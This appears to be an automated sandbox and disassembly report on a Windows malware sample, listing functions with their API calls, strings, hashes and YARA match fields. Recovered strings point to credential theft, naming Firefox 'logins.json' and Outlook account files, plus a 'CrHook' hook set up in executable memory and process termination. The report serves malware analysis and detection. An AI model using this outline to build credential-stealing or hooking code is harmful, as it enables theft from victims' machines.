Function 001D9A42, Relevance: 9.1, APIs: 6, Instructions: 64memorystringUNIQUE

Download Yara Rule

APIs

lstrlen.KERNEL32(001DDB80,00000000,00000000,00000008,?,?,001DDB80,001D2FB5,00000000,?), ref: 001D9A58
RtlAllocateHeap.NTDLL(00000000,00000009,00000000), ref: 001D9A6B
lstrcpy.KERNEL32(00000008,001DDB80), ref: 001D9A8D
GetLastError.KERNEL32(001DF489,00000000,00000000,?,?,001DDB80,001D2FB5,00000000,?), ref: 001D9AB6
HeapFree.KERNEL32(00000000,00000000,?,?,001DDB80,001D2FB5,00000000,?), ref: 001D9ACE
CloseHandle.KERNEL32(00000000,001DF489,00000000,00000000,?,?,001DDB80,001D2FB5,00000000,?), ref: 001D9AD7

Memory Dump Source

Source File: 00000005.00000002.923474706.00000000001C0000.00000040.00000001.sdmp, Offset: 001C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1c0000_CVPFktt.jbxd

Yara matches

Similarity

API ID: Heap$AllocateCloseErrorFreeHandleLastlstrcpylstrlen
String ID:
API String ID: 2860611006-0
Opcode ID: bfa78dc1aadd8227e041757df165c8245920c613b081a07bd9d804cc6b51c828
Instruction ID: a7bc5f747655b0d8ae313e24dff77945711be29398ea4731d30d369c9df9ba96
Opcode Fuzzy Hash: bfa78dc1aadd8227e041757df165c8245920c613b081a07bd9d804cc6b51c828
Instruction Fuzzy Hash: 7B118272600249EFCB149FA9DC888AFBBBCFB05364711452AF51AD7650EB309D85DB60

Uniqueness

Uniqueness Score: 100.00%

Function 001CCFD9, Relevance: 9.1, APIs: 6, Instructions: 64libraryloaderCOMMON

Download Yara Rule

APIs

Part of subcall function 001D3574: RtlAllocateHeap.NTDLL(00000000,?,001C102C), ref: 001D3580

LoadLibraryA.KERNEL32(6676736D,00000000,00000001,?,00000020,001C7F8E,00000000,00000001), ref: 001CCFF9
GetProcAddress.KERNEL32(00000000,704F4349), ref: 001CD018
GetProcAddress.KERNEL32(00000000,6C434349), ref: 001CD02D
GetProcAddress.KERNEL32(00000000,6E494349), ref: 001CD043
GetProcAddress.KERNEL32(00000000,65474349), ref: 001CD059
GetProcAddress.KERNEL32(00000000,65534349), ref: 001CD06F

Memory Dump Source

Source File: 00000005.00000002.923474706.00000000001C0000.00000040.00000001.sdmp, Offset: 001C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1c0000_CVPFktt.jbxd

Yara matches

Similarity

API ID: AddressProc$AllocateHeapLibraryLoad
String ID:
API String ID: 2486251641-0
Opcode ID: 033e8e134f4004a9d95f7b1fac64f1577ec1e452523994be3512e6755adfe959
Instruction ID: 3849e17cb0ae77eb382d16d2541435f1f0f3e2d74fabb92ca3e503f89fe3f15a
Opcode Fuzzy Hash: 033e8e134f4004a9d95f7b1fac64f1577ec1e452523994be3512e6755adfe959
Instruction Fuzzy Hash: 1D115EB260024A9FD710DBA8EC81E6A73ECFB55680316097DF518CB222EB31D9068B70

Uniqueness

Uniqueness Score: 0.10%

Function 001DF883, Relevance: 9.1, APIs: 6, Instructions: 63stringUNIQUE

Download Yara Rule

APIs

OpenProcess.KERNEL32(0000000100000E39,00000000,?), ref: 001DF8AB
_strupr.NTDLL ref: 001DF8E2
lstrlen.KERNEL32(00000000), ref: 001DF8EA
TerminateProcess.KERNEL32(00000000,00000000,?,00000000,?), ref: 001DF922
CloseHandle.KERNEL32(00000000,00000000,00000000,?,00000104), ref: 001DF929
GetLastError.KERNEL32 ref: 001DF931

Memory Dump Source

Source File: 00000005.00000002.923474706.00000000001C0000.00000040.00000001.sdmp, Offset: 001C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1c0000_CVPFktt.jbxd

Yara matches

Similarity

API ID: Process$CloseErrorHandleLastOpenTerminate_struprlstrlen
String ID:
API String ID: 110452925-0
Opcode ID: 44a75f17d2d99f0bae8705ed85ed237e1dfb11ccfc5624cc8999f58d3915794e
Instruction ID: 3dc0bce6fd0b613dd7126b7588fde51708958e6ff81dd8c8982bf763c3a848ff
Opcode Fuzzy Hash: 44a75f17d2d99f0bae8705ed85ed237e1dfb11ccfc5624cc8999f58d3915794e
Instruction Fuzzy Hash: DA11CAB6500244BFCB159FA0DCD8EAE77BDFBA4755B10442AF907D6250DB74C982CB21

Uniqueness

Uniqueness Score: 100.00%

Function 001C9760, Relevance: 9.1, APIs: 6, Instructions: 61stringthreadtimeUNIQUE

Download Yara Rule

APIs

GetTempPathA.KERNEL32(00000000,00000000,?,00000000,?,?,?,?,001C12CF,000000D3,?,001CE193,00000000,00000001), ref: 001C9772

Part of subcall function 001D3574: RtlAllocateHeap.NTDLL(00000000,?,001C102C), ref: 001D3580

GetTempPathA.KERNEL32(00000000,00000000,0000001D,?,00000000,?,?,?,?,001C12CF,000000D3,?,001CE193,00000000,00000001), ref: 001C978B
GetCurrentThreadId.KERNEL32 ref: 001C9798
GetSystemTimeAsFileTime.KERNEL32(00000001,?,00000000,?,?,?,?,001C12CF,000000D3,?,001CE193,00000000,00000001), ref: 001C97A4
GetTempFileNameA.KERNEL32(00000000,00000000,00000001,00000000,?,00000000,?,?,?,?,001C12CF,000000D3,?,001CE193,00000000,00000001), ref: 001C97B2
lstrcpy.KERNEL32(00000000), ref: 001C97D4

Memory Dump Source

Source File: 00000005.00000002.923474706.00000000001C0000.00000040.00000001.sdmp, Offset: 001C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1c0000_CVPFktt.jbxd

Yara matches

Similarity

API ID: Temp$FilePathTime$AllocateCurrentHeapNameSystemThreadlstrcpy
String ID:
API String ID: 1175089793-0
Opcode ID: 984ab5966328a32276a59be09c02128edc49c13694e4617fbf76a7193e7ea228
Instruction ID: 238cb8a4bf1a29eceaf35d9148bfed215cff4dc83b1c36d0a92b3ed265b63f95
Opcode Fuzzy Hash: 984ab5966328a32276a59be09c02128edc49c13694e4617fbf76a7193e7ea228
Instruction Fuzzy Hash: 2A01AD73A01259ABDB119BE59CCDE6F7ABCAB91B50709002AFA04D7101DB30D840CAB1

Uniqueness

Uniqueness Score: 100.00%

Function 0041877F, Relevance: 9.0, APIs: 6, Instructions: 49COMMONLIBRARYCODE

Download Yara Rule

APIs

__CreateFrameInfo.LIBCMT ref: 004187A7

Part of subcall function 00416F05: __getptd.LIBCMT ref: 00416F13
Part of subcall function 00416F05: __getptd.LIBCMT ref: 00416F21

__getptd.LIBCMT ref: 004187B1

Part of subcall function 00411A14: __getptd_noexit.LIBCMT ref: 00411A17
Part of subcall function 00411A14: __amsg_exit.LIBCMT ref: 00411A24

__getptd.LIBCMT ref: 004187BF
__getptd.LIBCMT ref: 004187CD
__getptd.LIBCMT ref: 004187D8
_CallCatchBlock2.LIBCMT ref: 004187FE

Part of subcall function 00416FAA: __CallSettingFrame@12.LIBCMT ref: 00416FF6

Part of subcall function 004188A5: __getptd.LIBCMT ref: 004188B4
Part of subcall function 004188A5: __getptd.LIBCMT ref: 004188C2

Memory Dump Source

Source File: 00000005.00000002.924505298.000000000040F000.00000020.00020000.sdmp, Offset: 0040F000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_40f000_CVPFktt.jbxd

Similarity

API ID: __getptd$Call$Block2CatchCreateFrameFrame@12InfoSetting__amsg_exit__getptd_noexit
String ID:
API String ID: 1602911419-0
Opcode ID: 39aaa8515ba96f3badedba6da910f2b5bca0efd39ccc0a6289535e426c545ba9
Instruction ID: aa2f003797592d157e8485d82906ca21f2750056a18afa056a48c672d1d5f153
Opcode Fuzzy Hash: 39aaa8515ba96f3badedba6da910f2b5bca0efd39ccc0a6289535e426c545ba9
Instruction Fuzzy Hash: 4611B4B1C012099FDF00EFA5D845AED7BB0BF04318F10806AF914A7261DB789A959B68

Uniqueness

Uniqueness Score: 0.08%

Function 001DA081, Relevance: 9.0, APIs: 4, Strings: 1, Instructions: 207UNIQUE

Download Yara Rule

APIs

memset.NTDLL ref: 001DA0DC
SetLastError.KERNEL32(00000000,?,?,?), ref: 001DA130

Strings

vids, xrefs: 001DA13B

Memory Dump Source

Source File: 00000005.00000002.923474706.00000000001C0000.00000040.00000001.sdmp, Offset: 001C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1c0000_CVPFktt.jbxd

Yara matches

Similarity

API ID: ErrorLastmemset
String ID: vids
API String ID: 3276359510-3767230166
Opcode ID: 64141f9c74d422095879140e328b3fe75338f45306218db2c6302fa9b9f44d2c
Instruction ID: 312e7d262e7e5bbd85bf717f109382d30df7870a618dc400ad3b2a2045d77c68
Opcode Fuzzy Hash: 64141f9c74d422095879140e328b3fe75338f45306218db2c6302fa9b9f44d2c
Instruction Fuzzy Hash: E28126B1D00229EFCF10DFA5C885AADBBB9BF18710F10816AF419EB251D7719A41CFA1

Uniqueness

Uniqueness Score: 100.00%

Function 001D569A, Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 117stringCOMMON

Download Yara Rule

APIs

StrRChrA.SHLWAPI(?,00000000,00000023,?), ref: 001D56B4
StrChrA.SHLWAPI(?,0000005C), ref: 001D56DB
lstrcpyn.KERNEL32(00000005,?,00000001,00000001), ref: 001D5701
lstrcpy.KERNEL32(?,Unknown), ref: 001D579E

Strings

Unknown, xrefs: 001D5792

Memory Dump Source

Source File: 00000005.00000002.923474706.00000000001C0000.00000040.00000001.sdmp, Offset: 001C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1c0000_CVPFktt.jbxd

Yara matches

Similarity

API ID: lstrcpylstrcpyn
String ID: Unknown
API String ID: 4154805583-1654365787
Opcode ID: f7431870c9a03a3e6eaa43d7317517371e0a8dfbfaa3a236d036dc2a23282425
Instruction ID: 92e708c9b1e90a4b59c0baab9361fc3524a72bc126bd2ab9dc3bbb1b16f6def3
Opcode Fuzzy Hash: f7431870c9a03a3e6eaa43d7317517371e0a8dfbfaa3a236d036dc2a23282425
Instruction Fuzzy Hash: D6416D76900659FFDB119BA8CC84DEEBBBEAF08350F6444A6F901E7151DB349E44CB60

Uniqueness

Uniqueness Score: 6.84%

Function 001C68E3, Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 107memoryUNIQUE

Download Yara Rule

APIs

RtlImageNtHeader.NTDLL(?), ref: 001C68F8
HeapFree.KERNEL32(00000000,?,?,?,?,00000001), ref: 001C6942
HeapFree.KERNEL32(00000000,?,CrHook,?,?,?,?,00000001), ref: 001C69A8
VirtualAlloc.KERNEL32(00000000,01000000,00003000,00000040,CrHook,?,?,?,?,00000001), ref: 001C69BC

Strings

CrHook, xrefs: 001C6969, 001C696E

Memory Dump Source

Source File: 00000005.00000002.923474706.00000000001C0000.00000040.00000001.sdmp, Offset: 001C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1c0000_CVPFktt.jbxd

Yara matches

Similarity

API ID: FreeHeap$AllocHeaderImageVirtual
String ID: CrHook
API String ID: 4232767482-2654099897
Opcode ID: 13ddc114b79ad128455e300fa7bf8d9820ec3d6117d2afb92d6d2e1c0987da54
Instruction ID: 85203d266f186317aa523e30ef2c87dc9eaee7a8d3d05afdf498f820504f1ecc
Opcode Fuzzy Hash: 13ddc114b79ad128455e300fa7bf8d9820ec3d6117d2afb92d6d2e1c0987da54
Instruction Fuzzy Hash: BD415E71A00249AFDF15DFA4CC90FAEBBB9FF64758F104069E905AB291D770DA80CB91

Uniqueness

Uniqueness Score: 100.00%

Function 001C1E5A, Relevance: 8.9, APIs: 7, Instructions: 106stringCOMMON

Download Yara Rule

APIs

memcpy.NTDLL(?,001D03BE,00000000,?,?,?,001D03BE,?,?,?,?,?), ref: 001C1E98
lstrlen.KERNEL32(001D03BE,?,?,?,001D03BE,?,?,?,?,?), ref: 001C1EAA
memcpy.NTDLL(?,?,?,?,?,?,?), ref: 001C1F1E
lstrlen.KERNEL32(001D03BE,00000000,00000000,?,?,?,001D03BE,?,?,?,?,?), ref: 001C1F33
lstrlen.KERNEL32(03F8458B,?,?,?,?,?,?,?), ref: 001C1F4C
memcpy.NTDLL(?,03F8458B,00000000,?,?,?,?,?,?,?), ref: 001C1F55
LocalFree.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 001C1F63

Memory Dump Source

Source File: 00000005.00000002.923474706.00000000001C0000.00000040.00000001.sdmp, Offset: 001C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1c0000_CVPFktt.jbxd

Yara matches

Similarity

API ID: lstrlenmemcpy$FreeLocal
String ID:
API String ID: 1123625124-0
Opcode ID: c8b22a5e2a3cca23dfcf51e6fbcd83c24529c83339cd79ff8feb339d170b5c0e
Instruction ID: 570d589b09e59a0e913eccddda318c1ba81f2d4019c810c7f8b962df28efe786
Opcode Fuzzy Hash: c8b22a5e2a3cca23dfcf51e6fbcd83c24529c83339cd79ff8feb339d170b5c0e
Instruction Fuzzy Hash: 5D3117B280025ABFDF119F65DD4699F3FA8EF253A0B154029FC08A6251E771DE608BE0

Uniqueness

Uniqueness Score: 1.69%

Function 001C20A3, Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 102memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 001C4EC8: GetSystemTimeAsFileTime.KERNEL32(?,00000000,00000100,?,00000000,?,00000000,?,00000000), ref: 001C4ED6

RtlAllocateHeap.NTDLL(00000000,?), ref: 001C2104
RtlAllocateHeap.NTDLL(00000000,00000000), ref: 001C2153

Part of subcall function 001DB407: CreateFileW.KERNEL32(?,C0000000,?,00000000,?,00000080,00000000), ref: 001DB448
Part of subcall function 001DB407: GetLastError.KERNEL32 ref: 001DB452
Part of subcall function 001DB407: WaitForSingleObject.KERNEL32(000000C8), ref: 001DB477
Part of subcall function 001DB407: CreateFileW.KERNEL32(?,C0000000,00000000,00000000,?,00000080,00000000), ref: 001DB498
Part of subcall function 001DB407: SetFilePointer.KERNEL32(?,00000000,00000000,00000002), ref: 001DB4C0
Part of subcall function 001DB407: WriteFile.KERNEL32(?,00001388,?,00000002,00000000), ref: 001DB4D5
Part of subcall function 001DB407: SetEndOfFile.KERNEL32(?), ref: 001DB4E2
Part of subcall function 001DB407: CloseHandle.KERNEL32(?), ref: 001DB4FA

HeapFree.KERNEL32(00000000,00000000,?,00000000,?,00000101,?,00000000,?,?,?,00000000,?,00000001), ref: 001C2188
HeapFree.KERNEL32(00000000,?,?,00000000,?,00000001), ref: 001C2198

Strings

https://, xrefs: 001C20B5

Memory Dump Source

Source File: 00000005.00000002.923474706.00000000001C0000.00000040.00000001.sdmp, Offset: 001C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1c0000_CVPFktt.jbxd

Yara matches

Similarity

API ID: File$Heap$AllocateCreateFreeTime$CloseErrorHandleLastObjectPointerSingleSystemWaitWrite
String ID: https://
API String ID: 4200334623-4275131719
Opcode ID: a667c558a8a5013b3156b6647d0b23a87b3a9d3efd211655b1f43a29a8512ecd
Instruction ID: a5a725e6ef60b77a6a3edc80145ac563229d4a3893fb9d1e3f51231705765da5
Opcode Fuzzy Hash: a667c558a8a5013b3156b6647d0b23a87b3a9d3efd211655b1f43a29a8512ecd
Instruction Fuzzy Hash: D9312971500119BFDB109FA4CCC9CAEBB7EFB18354B100069F601E7160DB71AE91DB60

Uniqueness

Uniqueness Score: 1.05%

Function 001D744E, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 81memorystringCOMMON

Download Yara Rule

APIs

Part of subcall function 001DDDAE: memcpy.NTDLL(00000000,00000084,00000084,?,00000000,00000000,001C27B7,?,?,?,00000000,?,?,001D11A4,00000000,00000001), ref: 001DDDCC
Part of subcall function 001DDDAE: memset.NTDLL ref: 001DDE01

RtlAllocateHeap.NTDLL(00000000,00000008,?), ref: 001D74A3
lstrcmpi.KERNEL32(00000000,Main), ref: 001D74C3
HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001D750A
HeapFree.KERNEL32(00000000,?,?,?,?,00000000,7767D3D0), ref: 001D751B

Strings

Main, xrefs: 001D74BB

Memory Dump Source

Source File: 00000005.00000002.923474706.00000000001C0000.00000040.00000001.sdmp, Offset: 001C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1c0000_CVPFktt.jbxd

Yara matches

Similarity

API ID: Heap$Free$Allocatelstrcmpimemcpymemset
String ID: Main
API String ID: 3716724125-521822810
Opcode ID: 5a2f9e490b2e7d8d8dd798a213be79c6cfde7cb10ad70a1c7fbb162a84d134b5
Instruction ID: 70776b505443ca6843e3a0671dd630a672d90db0756b66e856af64f70fd5cae7
Opcode Fuzzy Hash: 5a2f9e490b2e7d8d8dd798a213be79c6cfde7cb10ad70a1c7fbb162a84d134b5
Instruction Fuzzy Hash: 2C21A331600109FFDF11AFA4EC84EAE7BB9EB14344F104425F504AB2A1E730EE44DB51

Uniqueness

Uniqueness Score: 1.47%

Function 001C7763, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 79libraryCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(NTDLL.DLL), ref: 001C7774
LoadLibraryA.KERNEL32(NTDSAPI.DLL), ref: 001C780E
FreeLibrary.KERNEL32(00000000), ref: 001C7819

Strings

NTDSAPI.DLL, xrefs: 001C7807
NTDLL.DLL, xrefs: 001C776F

Memory Dump Source

Source File: 00000005.00000002.923474706.00000000001C0000.00000040.00000001.sdmp, Offset: 001C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1c0000_CVPFktt.jbxd

Yara matches

Similarity

API ID: Library$FreeHandleLoadModule
String ID: NTDLL.DLL$NTDSAPI.DLL
API String ID: 2140536961-3558519346
Opcode ID: b2928869d1c95faca3db624ede3133342cb78b8f85f5b7020d023267c5e91be5
Instruction ID: 92ce50197eb9a7b341b2822209f5e9d4e876a50ff109c5c22e6245a7c3d4ac50
Opcode Fuzzy Hash: b2928869d1c95faca3db624ede3133342cb78b8f85f5b7020d023267c5e91be5
Instruction Fuzzy Hash: B9318E719083068FD714CF29C488B6ABBE0FFA4719F14496DE88987291E3B0D949CF92

Uniqueness

Uniqueness Score: 1.59%

Function 001C129D, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 74memoryfileUNIQUE

Download Yara Rule

APIs

Part of subcall function 001DDFFE: RtlAllocateHeap.NTDLL(00000000,00000105,00000000), ref: 001DE043
Part of subcall function 001DDFFE: RtlAllocateHeap.NTDLL(00000000,00000105), ref: 001DE05B
Part of subcall function 001DDFFE: WaitForSingleObject.KERNEL32(00000000,?,?,?,?,?,?,001C12B9,001CE193,00000000,00000001), ref: 001DE124
Part of subcall function 001DDFFE: HeapFree.KERNEL32(00000000,00000000,?,?,?,?,?,?,001C12B9,001CE193,00000000,00000001), ref: 001DE14D
Part of subcall function 001DDFFE: HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,001C12B9,001CE193,00000000,00000001), ref: 001DE15D
Part of subcall function 001DDFFE: RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,001C12B9,001CE193,00000000,00000001), ref: 001DE166

Part of subcall function 001C9760: GetTempPathA.KERNEL32(00000000,00000000,?,00000000,?,?,?,?,001C12CF,000000D3,?,001CE193,00000000,00000001), ref: 001C9772
Part of subcall function 001C9760: GetTempPathA.KERNEL32(00000000,00000000,0000001D,?,00000000,?,?,?,?,001C12CF,000000D3,?,001CE193,00000000,00000001), ref: 001C978B
Part of subcall function 001C9760: GetCurrentThreadId.KERNEL32 ref: 001C9798
Part of subcall function 001C9760: GetSystemTimeAsFileTime.KERNEL32(00000001,?,00000000,?,?,?,?,001C12CF,000000D3,?,001CE193,00000000,00000001), ref: 001C97A4
Part of subcall function 001C9760: GetTempFileNameA.KERNEL32(00000000,00000000,00000001,00000000,?,00000000,?,?,?,?,001C12CF,000000D3,?,001CE193,00000000,00000001), ref: 001C97B2
Part of subcall function 001C9760: lstrcpy.KERNEL32(00000000), ref: 001C97D4

Part of subcall function 001D2F63: lstrlen.KERNEL32(001CE193,00000000,00000000,?,001C12E2,00000000,?,000000D3,?,001CE193,00000000,00000001), ref: 001D2F6C
Part of subcall function 001D2F63: mbstowcs.NTDLL ref: 001D2F93
Part of subcall function 001D2F63: memset.NTDLL ref: 001D2FA5

Part of subcall function 001C3F6D: RtlFreeHeap.NTDLL(00000000,?,001C1091,00000000), ref: 001C3F79

PathFindFileNameW.SHLWAPI(00000000,00000000,00000000,?,000000D3,?,001CE193,00000000,00000001), ref: 001C12FB

Part of subcall function 001C8069: lstrlenW.KERNEL32(?,00000000,00000000,?,00000250,?,00000000), ref: 001C80B5
Part of subcall function 001C8069: lstrlenW.KERNEL32(?,?,00000000), ref: 001C80C1
Part of subcall function 001C8069: memset.NTDLL ref: 001C8109
Part of subcall function 001C8069: FindFirstFileW.KERNEL32(00000000,00000000), ref: 001C8124
Part of subcall function 001C8069: lstrlenW.KERNEL32(000000D3), ref: 001C815C
Part of subcall function 001C8069: lstrlenW.KERNEL32(?), ref: 001C8164
Part of subcall function 001C8069: memset.NTDLL ref: 001C8187
Part of subcall function 001C8069: wcscpy.NTDLL ref: 001C8199

DeleteFileW.KERNEL32(00000001,00000000,*.bin,?,00000000,00000000,00000000,?,000000D3,?,001CE193,00000000,00000001), ref: 001C132E
HeapFree.KERNEL32(00000000,?,?,000000D3,?,001CE193,00000000,00000001), ref: 001C1347
HeapFree.KERNEL32(00000000,?,00000000,*.bin,?,00000000,00000000,00000000,?,000000D3,?,001CE193,00000000,00000001), ref: 001C135A

Strings

*.bin, xrefs: 001C130B

Memory Dump Source

Source File: 00000005.00000002.923474706.00000000001C0000.00000040.00000001.sdmp, Offset: 001C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1c0000_CVPFktt.jbxd

Yara matches

Similarity

API ID: Heap$FileFreelstrlen$PathTempmemset$AllocateFindNameTime$CloseCurrentDeleteFirstObjectSingleSystemThreadWaitlstrcpymbstowcswcscpy
String ID: *.bin
API String ID: 3311952166-1490590538
Opcode ID: a422052d2ae294868fa8196a966383b6e99c9691d217580028ace3f7dfe4bfc3
Instruction ID: 5e45e1d5b46c3d7827f7b418d9a73c47651467614320610da7dc6c378e60150b
Opcode Fuzzy Hash: a422052d2ae294868fa8196a966383b6e99c9691d217580028ace3f7dfe4bfc3
Instruction Fuzzy Hash: 1D219F71901254BFCB209BE5CC84E9FBBBCEF69B64B10041AF504A7651D770D940CBA1

Uniqueness

Uniqueness Score: 100.00%

Function 001C7AEA, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 66stringUNIQUE

Download Yara Rule

APIs

lstrlenW.KERNEL32(?), ref: 001C7AFA

Part of subcall function 001D3574: RtlAllocateHeap.NTDLL(00000000,?,001C102C), ref: 001D3580

WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000001,00000000,00000000,00000001), ref: 001C7B1C
lstrcpyW.KERNEL32(00000000,?), ref: 001C7B48
lstrcatW.KERNEL32(00000000,\logins.json), ref: 001C7B54

Part of subcall function 001DA37B: strstr.NTDLL ref: 001DA436
Part of subcall function 001DA37B: strstr.NTDLL ref: 001DA47B

Strings

\logins.json, xrefs: 001C7B4E

Memory Dump Source

Source File: 00000005.00000002.923474706.00000000001C0000.00000040.00000001.sdmp, Offset: 001C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1c0000_CVPFktt.jbxd

Yara matches

Similarity

API ID: strstr$AllocateByteCharHeapMultiWidelstrcatlstrcpylstrlen
String ID: \logins.json
API String ID: 3712611166-2913861366
Opcode ID: 6de699f814ec92bf8f856a88d0350177a8cb1f8906af679bd8ca20daf58072f3
Instruction ID: c41fcc0a249f0804379cd553e294f3e384969f770dde7bbc8b4e9748299ee219
Opcode Fuzzy Hash: 6de699f814ec92bf8f856a88d0350177a8cb1f8906af679bd8ca20daf58072f3
Instruction Fuzzy Hash: 8C114672500119BFDF11AFA5CC89E9EBFBDEF25390B004129F90596120DB71DE40DBA0

Uniqueness

Uniqueness Score: 100.00%

Function 001D0F24, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 58stringCOMMON

Download Yara Rule

APIs

lstrlen.KERNEL32(00000000,?,?,?,?,?,001C3FF2,?,?), ref: 001D0F38

Part of subcall function 001D3574: RtlAllocateHeap.NTDLL(00000000,?,001C102C), ref: 001D3580

mbstowcs.NTDLL ref: 001D0F54
lstrlen.KERNEL32(account{*}.oeaccount), ref: 001D0F62
mbstowcs.NTDLL ref: 001D0F7A

Part of subcall function 001C8069: lstrlenW.KERNEL32(?,00000000,00000000,?,00000250,?,00000000), ref: 001C80B5
Part of subcall function 001C8069: lstrlenW.KERNEL32(?,?,00000000), ref: 001C80C1
Part of subcall function 001C8069: memset.NTDLL ref: 001C8109
Part of subcall function 001C8069: FindFirstFileW.KERNEL32(00000000,00000000), ref: 001C8124
Part of subcall function 001C8069: lstrlenW.KERNEL32(000000D3), ref: 001C815C
Part of subcall function 001C8069: lstrlenW.KERNEL32(?), ref: 001C8164
Part of subcall function 001C8069: memset.NTDLL ref: 001C8187
Part of subcall function 001C8069: wcscpy.NTDLL ref: 001C8199

Part of subcall function 001C3F6D: RtlFreeHeap.NTDLL(00000000,?,001C1091,00000000), ref: 001C3F79

Strings

account{*}.oeaccount, xrefs: 001D0F5C, 001D0F61, 001D0F78

Memory Dump Source

Source File: 00000005.00000002.923474706.00000000001C0000.00000040.00000001.sdmp, Offset: 001C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1c0000_CVPFktt.jbxd

Yara matches

Similarity

API ID: lstrlen$Heapmbstowcsmemset$AllocateFileFindFirstFreewcscpy
String ID: account{*}.oeaccount
API String ID: 1961997177-4234512180
Opcode ID: d638493cd395331d40d13dc4f5e9d91729bf7ab0d6ab1c7d5095f2bd83def849
Instruction ID: 8109f7eebe47e133f72fb709a3a8ae9f95303bcb357585bba53bec2c1eade393
Opcode Fuzzy Hash: d638493cd395331d40d13dc4f5e9d91729bf7ab0d6ab1c7d5095f2bd83def849
Instruction Fuzzy Hash: DB01B9B2D00204BBDF21ABA5DC86F8F7FBCEFA4754F10412AB504A2141DB71DE1097A0

Uniqueness

Uniqueness Score: 2.28%

Function 001C8B74, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 49libraryloaderCOMMON

Download Yara Rule

APIs

GetVersion.KERNEL32(001E6320,001D9142,?,00000000,?,?,?,?,?,001CEF2B,?), ref: 001C8B78
GetModuleHandleA.KERNEL32(NTDLL.DLL,LdrRegisterDllNotification,?,00000000,?,?,?,?,?,001CEF2B,?), ref: 001C8B8C
GetProcAddress.KERNEL32(00000000), ref: 001C8B93

Strings

LdrRegisterDllNotification, xrefs: 001C8B82
NTDLL.DLL, xrefs: 001C8B87

Memory Dump Source

Source File: 00000005.00000002.923474706.00000000001C0000.00000040.00000001.sdmp, Offset: 001C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1c0000_CVPFktt.jbxd

Yara matches

Similarity

API ID: AddressHandleModuleProcVersion
String ID: LdrRegisterDllNotification$NTDLL.DLL
API String ID: 3310240892-3368964806
Opcode ID: 57d4e496bcaf31a10fc6a79cc5377d2c2bec14e1b0c8722621d9a70c725ff79f
Instruction ID: 98991fc8c1fe5b1becb57eee34c32bfffc501c1e2657c65ba4e4778139ba7987
Opcode Fuzzy Hash: 57d4e496bcaf31a10fc6a79cc5377d2c2bec14e1b0c8722621d9a70c725ff79f
Instruction Fuzzy Hash: 0A019EB0244342AFC7508FAA8DC8F19BBE9BB65300F45C06DE049CB6A1DF71C840CB11

Uniqueness

Uniqueness Score: 1.23%

Function 001C79D7, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 45libraryloaderCOMMON

Download Yara Rule

APIs

GetVersion.KERNEL32(?,?,77A4F720,?,001C786B,00000000,?,?,?,001D7E0D), ref: 001C79FB
GetModuleHandleA.KERNEL32(NTDLL.DLL,LdrUnregisterDllNotification,?,77A4F720,?,001C786B,00000000,?,?,?,001D7E0D), ref: 001C7A0F
GetProcAddress.KERNEL32(00000000), ref: 001C7A16

Strings

LdrUnregisterDllNotification, xrefs: 001C7A05
NTDLL.DLL, xrefs: 001C7A0A

Memory Dump Source

Source File: 00000005.00000002.923474706.00000000001C0000.00000040.00000001.sdmp, Offset: 001C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1c0000_CVPFktt.jbxd

Yara matches

Similarity

API ID: AddressHandleModuleProcVersion
String ID: LdrUnregisterDllNotification$NTDLL.DLL
API String ID: 3310240892-3940208311
Opcode ID: db1a4daa23807e4a56f941df0946370ff1c666a995abd66170ad2360c4e846c9
Instruction ID: 6b1dbb4405e4560f228a83e0cfffc27950eb025985f4b5af692def39117b5ee6
Opcode Fuzzy Hash: db1a4daa23807e4a56f941df0946370ff1c666a995abd66170ad2360c4e846c9
Instruction Fuzzy Hash: 0201AD712092009FC7209FA9D898E2DB7ADFFA9700318841DF50A9B7A1D7B1DD41CF61

Uniqueness

Uniqueness Score: 1.55%

Function 001D91AB, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 39memorystringUNIQUE

Download Yara Rule

APIs

InterlockedExchange.KERNEL32(001E5FB0,00000000), ref: 001D91B7
RtlAllocateHeap.NTDLL(00000000,0000002A), ref: 001D91D2
lstrcpy.KERNEL32(00000000,-01), ref: 001D91F3
HeapFree.KERNEL32(00000000,00000000,?,00000000), ref: 001D9214

Part of subcall function 001D4A52: SetEvent.KERNEL32(?,001C8B63), ref: 001D4A66
